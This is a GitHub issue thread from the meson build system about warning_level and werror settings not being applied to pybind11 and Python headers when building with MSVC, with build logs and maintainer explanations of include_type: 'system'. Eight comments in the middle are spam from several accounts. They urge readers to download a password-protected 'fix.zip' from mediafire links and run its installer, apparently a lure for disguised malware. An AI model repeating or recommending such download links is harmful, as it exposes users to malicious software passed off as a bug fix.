### ISSUE TITLE
Warning Level & Werror are not applied to external dependencies

### ISSUE THREAD

**Issue by phil-zxx** [mesonbuild/meson#13600]
**Describe the bug**
Possibly related to https://github.com/mesonbuild/meson/issues/5466.

My top-level project has these settings:
```python
# ./meson.build
project('mylib', 'cpp',
    version: '0.1.0',
    default_options: [
        'warning_level=everything',
        'werror=true'])
```
using `warning_level` and `werror`. But for my python bindings (or rather all external headers) I want to disable `werror` because `pybind11` is generating some warnings. So I tried this
```python
pybind11_dep = dependency('pybind11',
    default_options: [
        'warning_level=1',
        'werror=false'])
```
However, this does **not work** and produces many warnings/errors:
```
...
Run-time dependency python found: YES 3.12
Build targets in project: 2

Found ninja-1.11.1.git.kitware.jobserver-1 at \meson_test\.env\Scripts\ninja.EXE
ninja: Entering directory `builddir'

[3/4] Compiling C++ object mylib_py/mylib.cp312-win_amd64.pyd.p/src_Bindings.cpp.obj
FAILED: mylib_py/mylib.cp312-win_amd64.pyd.p/src_Bindings.cpp.obj 
    "cl" "-Imylib_py\mylib.cp312-win_amd64.pyd.p" "-Imylib_py" "-I..\mylib_py" "-I..\mylib_cpp\include" "-I\Python312_x64\Include"
    "-I\meson_test\.env\Lib\site-packages\pybind11\include" "/MDd" "/nologo" "/showIncludes" "/utf-8" "/Zc:__cplusplus" "/Wall" 
    "/WX" "/EHsc" "/Od" "/Zi" "/Fdmylib_py\mylib.cp312-win_amd64.pyd.p\src_Bindings.cpp.pdb"
    /Fomylib_py/mylib.cp312-win_amd64.pyd.p/src_Bindings.cpp.obj "/c" ../mylib_py/src/Bindings.cpp
\Python312_x64\Include\object.h(343): error C2220: the following warning is treated as an error
\Python312_x64\Include\object.h(343): warning C4820: '<unnamed-tag>': '4' bytes padding added after data member '<unnamed-tag>::slot'
...
\meson_test\.env\Lib\site-packages\pybind11\include\pybind11\detail/common.h(1017): warning C4623: 'pybind11::builtin_exception': default constructor was implicitly defined as deleted
...
ninja: build stopped: subcommand failed.
```

**To Reproduce**
1. Extract the  attached `zip` file [meson_test_werror.zip](https://github.com/user-attachments/files/16748096/meson_test_werror.zip) into a folder `meson_test`
2. Run `python -m venv .env` to create a virtual environment, and activate the environment.
3. Run `pip install -r .\requirements.txt` which will install `meson`, `ninja` and `pybind11`.
4. Run `.\my_build.bat`

**Expected behavior**
I would expect compilation to be successful like so:
```
[vcvarsall.bat] Environment initialized for: 'x64'
The Meson build system
Version: 1.5.1
Source dir: \meson_test
Build dir: \meson_test\builddir
Build type: native build
Project name: mylib
Project version: 0.1.0
C++ compiler for the host machine: cl (msvc 19.42.34226.3 "Microsoft (R) C/C++ Optimizing Compiler Version 19.42.34226.3 for x64")
C++ linker for the host machine: link link 14.42.34226.3
Host machine cpu family: x86_64
Host machine cpu: x86_64
Did not find pkg-config by name 'pkg-config'
Found pkg-config: NO
pybind11-config found: YES (\meson_test\.env\Scripts\pybind11-config.EXE) 2.13.5
Run-time dependency pybind11 found: YES 2.13.5
Program python3 found: YES (\meson_test\.env\Scripts\python.exe)
WARNING: Using a debug build type with MSVC or an MSVC-compatible compiler
when the Python interpreter is not also a debug build will almost
certainly result in a failed build. Prefer using a release build
type or a debug Python interpreter.

Run-time dependency python found: YES 3.12
Build targets in project: 2

Found ninja-1.11.1.git.kitware.jobserver-1 at \meson_test\.env\Scripts\ninja.EXE
ninja: Entering directory `builddir'
[4/4] Linking target mylib_py/mylib.cp312-win_amd64.pyd
   Creating library mylib_py\mylib.cp312-win_amd64.lib and object mylib_py\mylib.cp312-win_amd64.exp
```

**system parameters**
* OS: Windows 11
* Compiler: MSVC
* `python --version` gives `Python 3.12.4`
* `meson --version` gives `1.5.1`
* `ninja --version` gives `1.11.1.git.kitware.jobserver-1`

**Comment by Superming997** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by haohaohaoadsad** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by eli-schwartz** [comment]
These options are applied to build rules, not code sources. And default_options for dependency() is only used when building a dependency via subproject fallback. It still wouldn't apply to pybind11 because pybind11 is header-only, so the warnings occur in *your* code, but do so transitively.


What you're after is silencing transitive warnings:
- A compiler cannot be told to "use -Werror, but only for my own code".
- The microsoft compiler *can* be told to mark certain header directories as "external code" and specify a different warning level for it. That is tracked by #11632 (meson doesn't yet implement this).

**Comment by phil-zxx** [comment]
@eli-schwartz Please correct me if I am wrong, but I was under the impression that a build system can still guide the compiler to use certain flags for certain headers or compilation units.

I am not an expert on this. But for example, I currently maintain a cross-platform library (Linux & Windows) via `CMake`, and we include external headers like this:
```cmake
target_include_directories(MY_LIB_NAME SYSTEM ${CMAKE_CURRENT_SOURCE_DIR}/external/nlohmann)
target_include_directories(MY_LIB_NAME SYSTEM ${CMAKE_CURRENT_SOURCE_DIR}/external/pybind11)
```
Here, `SYSTEM` has "_effects such as suppressing warnings or skipping the contained headers in dependency calculations_", as per [cmake documentation](https://cmake.org/cmake/help/latest/command/target_include_directories.html). That way, we can use `-Wall -Werror` with g++ and similarly `/Wall /WX` with msvc, without having to worry about any potential warnings from `nlohmann` or `pybind11`.

I was exploring `meson` as a `CMake` successor for our library, but if we cannot turn off warnings originating from external headers, it would be impossible for us to move to `meson`. Hence why I created this issue.

**Comment by eli-schwartz** [comment]
The SYSTEM keyword in cmake is equivalent to meson's https://mesonbuild.com/Reference-manual_functions.html#dependency_include_type

```meson
dependency('pybind11', include_type: 'system')
```

This does the same thing with cmake and meson -- it causes header includes to be specified via -isystem instead of -I (at least for gcc / clang).

It is a commonly used hack. The compiler documents that this include specification affects fixed includes, compiler intrinsics, and the precedence of `#include_next`. Officially, the compiler does NOT change how warnings are issued. (Literally. The compiler documentation doesn't discuss this.) Unofficially, it has the additional side effect of suppressing warnings.

Many people don't mind if the compiler makes a hash of their codebase as long as it suppresses warnings. And unless you accidentally detect a dependency with "/usr/include" and cast that to a "system" header you may get away without adverse effects. But perhaps the number one (mis)use worldwide of "system" is for the Boost headers! And erm let's just say that doesn't work out well.

Anyway, meson supports it whether it's a good idea or not. In principle, it's even possible for people to use it for its intended purpose of overriding the precedence of `#include_next` when doing complicated fiddly things to the stdlib within their project.

**Comment by phil-zxx** [comment]
Thanks for the detailed explanation.

I've tried using `pybind11_dep = dependency('pybind11', include_type: 'system')` in the `mylib_py\meson.build` from my linked sample project [meson_test_werror.zip](https://github.com/user-attachments/files/16748096/meson_test_werror.zip). However, I am still getting the same warnings (and hence errors) as before.

Is this because of #11632 the flag `include_type: 'system'` is not supported with **MSVC** on Windows (yet)? But if I were using **g++** on Linux, then `include_type: 'system'` should work and suppress all the warnings?
